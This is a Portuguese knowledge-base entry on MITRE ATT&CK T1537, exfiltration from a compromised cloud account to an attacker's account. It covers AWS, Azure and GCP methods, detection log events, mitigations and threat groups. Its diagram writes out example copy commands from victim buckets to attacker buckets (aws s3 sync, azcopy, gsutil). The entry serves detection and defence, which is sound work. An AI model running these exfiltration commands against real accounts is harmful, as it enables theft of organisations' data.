t1537-transfer-data-to-cloud-account

# T1537 - Transfer Data to Cloud Account ## Visão Geral T1537 descreve uma forma de exfiltração que explora a confiança implícita dos ambientes de nuvem: em vez de enviar dados para infraestrutura controlada externamente, o adversário transfere os dados **dentro do mesmo provedor cloud** - de uma conta comprometida para uma conta própria. Essa abordagem é particularmente eficaz contra soluções de DLP e monitoramento perimetral que inspecionam tráfego saindo para a internet, mas ignoram movimentações internas ao ecossistema de um provedor (AWS para AWS, Azure para Azure, Google Cloud para Google Cloud). O tráfego usa APIs nativas e endereçamento interno, tornando-o práticamente indistinguível de operações legítimas. ```mermaid graph TB A([Conta de vítima comprometida]) --> B{Método de transferência} B --> C[APIs nativas do provedor] B --> D[Mecanismos de compartilhamento] B --> E[Backup / Snapshot de instância] C --> C1[AWS S3 cross-account copy aws s3 sync s3://victim-bucket s3://attacker-bucket] C --> C2[Azure AzCopy entre tenants azcopy copy victim-container attacker-container] C --> C3[GCP gsutil cross-project gsutil cp -r gs://victim gs://attacker] D --> D1[Azure SAS URI link anônimo por tempo limitado] D --> D2[AWS Pre-signed URL acesso temporário sem credencial] D --> D3[Google Drive compartilhamento anônimo ou por e-mail do adversário] E --> E1[AWS AMI snapshot transferida para conta controlada] E --> E2[Azure Managed Disk export cópia de VM completa] C1 & C2 & C3 & D1 & D2 & D3 & E1 & E2 --> F([Dados na conta do adversário]) F --> G[Acesso persistente aos dados fora do ambiente da vítima] ``` ## Como Funciona ### Transferência via API Nativa (Cloud-to-Cloud) Cada grande provedor expõe APIs que permitem copiar objetos entre buckets ou contêineres de contas diferentes. Com credenciais comprometidas da conta da vítima, o adversário configura permissões de leitura para sua própria conta e executa a cópia: - **AWS:** `aws s3 sync` com bucket policy permitindo cross-account access - **Azure:** `azcopy copy` de um contêiner de Blob Storage para outro tenant via token SAS - **GCP:** `gsutil cp` com IAM binding concedendo acesso ao projeto do adversário Esse tráfego viajá pelo backbone interno do provedor, sem cruzar a internet pública - evitando inspeção por firewalls e proxies da organização. ### Mecanismos de Compartilhamento Temporário Provedores oferecem mecanismos nativos para compartilhamento controlado de dados: - **Azure SAS (Shared Access Signature):** URI com assinatura criptográfica que concede acesso temporário a um contêiner ou blob sem exigir credenciais completas. O adversário gera o URI na conta comprometida e o usa de qualquer lugar. - **AWS Pre-signed URLs:** funcionam de forma similar - concedem acesso GET ou PUT temporário a um objeto S3. - **Links anônimos (OneDrive, Google Drive):** em ambientes SaaS, o adversário pode criar links de compartilhamento público para documentos e arquivos corporativos sensíveis. ### Backup e Snapshot de Instâncias Em ambientes IaaS, adversários podem criar snapshots de volumes e discos (incluindo instâncias EC2 completas via AMI) e transferi-los para contas controladas. Essa técnica entrega não apenas dados, mas potencialmente a configuração completa da máquina - incluindo credenciais em disco e certificados. Incidentes documentados incluem a criação de AMIs customizadas de servidores de banco de dados e sua posterior transferência para contas AWS controladas pelo atacante. ## Evasão e Detecção A principal dificuldade de detecção está na natureza do tráfego: **ele parece legítimo**. Organizações que monitoram apenas transferências para destinos externos à nuvem ficam cegas para essa técnica. > [!warning] Pontos de detecção críticos > - **CloudTrail / Azure Monitor / GCP Audit Logs:** eventos de `GetObject`, `CopyObject`, `PutBucketPolicy` com contas externas como principals > - **Criação de SAS URIs e pre-signed URLs:** eventos `GenerateSasToken`, `CreatePresignedPost` fora do padrão operacional > - **Novos snapshots ou AMIs:** alertar em `CreateSnapshot`, `CreateImage`, `RegisterImage` seguidos de `ModifySnapshotAttribute` com `AddUserGroup` externo > - **Compartilhamento de arquivos com e-mails externos (SaaS):** eventos de compartilhamento de OneDrive ou Google Drive com domínios fora da organização > [!tip] Correlação recomendada > Combinar alertas de T1537 com [[t1078-valid-accounts|T1078 - Contas Válidas]] e [[t1530-data-from-cloud-storage|T1530 - Dados de Armazenamento Cloud]]: a sequência típica é comprometer credenciais → acessar dados → exfiltrar para conta própria. ## Contexto de Uso e LATAM [[g1039-redcurl|RedCurl]], grupo de espionagem corporativa com foco em roubo de documentos sigilosos, usa técnicas de cloud-to-cloud exfiltration em campanhas contra empresas de mineração, finanças e advocacia - setores com presença relevante no Brasil e América Latina. [[g1053-storm-0501|Storm-0501]] e [[g1032-inc-ransom|INC Ransom]] operam com modelo de dupla extorsão: exfiltram dados para ambiente controlado antes de criptografar a infraestrutura da vítima. O uso de T1537 garante que os dados permaneçam acessíveis ao grupo mesmo após a vítima restaurar sistemas. Em ambientes corporativos com adoção crescente de Microsoft 365 e AWS no Brasil, a superfície de ataque para esta técnica está em expansão - especialmente em organizações sem CASB (Cloud Access Security Broker) ou políticas de prevenção de exfiltração em nível de SaaS. ## Mitigações | ID | Mitigação | Aplicação | |----|-----------|-----------| | [[m1057-data-loss-prevention\|M1057 - Data Loss Prevention]] | Implementar DLP em nível de cloud (CASB) para detectar transferências anômalas entre contas | | [[m1018-user-account-management\|M1018 - User Account Management]] | Revisar e limitar permissões cross-account; remover acesso desnecessário entre contas | | [[m1054-software-configuration\|M1054 - Software Configuration]] | Desabilitar compartilhamento público em buckets S3/Blob Storage por padrão; usar políticas de organização | | [[m1037-filter-network-traffic\|M1037 - Filter Network Traffic]] | Restringir quais contas podem ser destinos de cópias via Service Control Policies (AWS SCP) ou Azure Policy | ## Threat Actors que Usam - [[g1053-storm-0501|Storm-0501]] - ransomware com exfiltração prévia em ambientes Azure e AWS - [[g1032-inc-ransom|INC Ransom]] - dupla extorsão, transferência de dados para cloud controlada antes do ransom - [[g1039-redcurl|RedCurl]] - espionagem corporativa, roubo de documentos via cloud compartilhado --- *Fonte: MITRE ATT&CK - T1537, versão 16.2*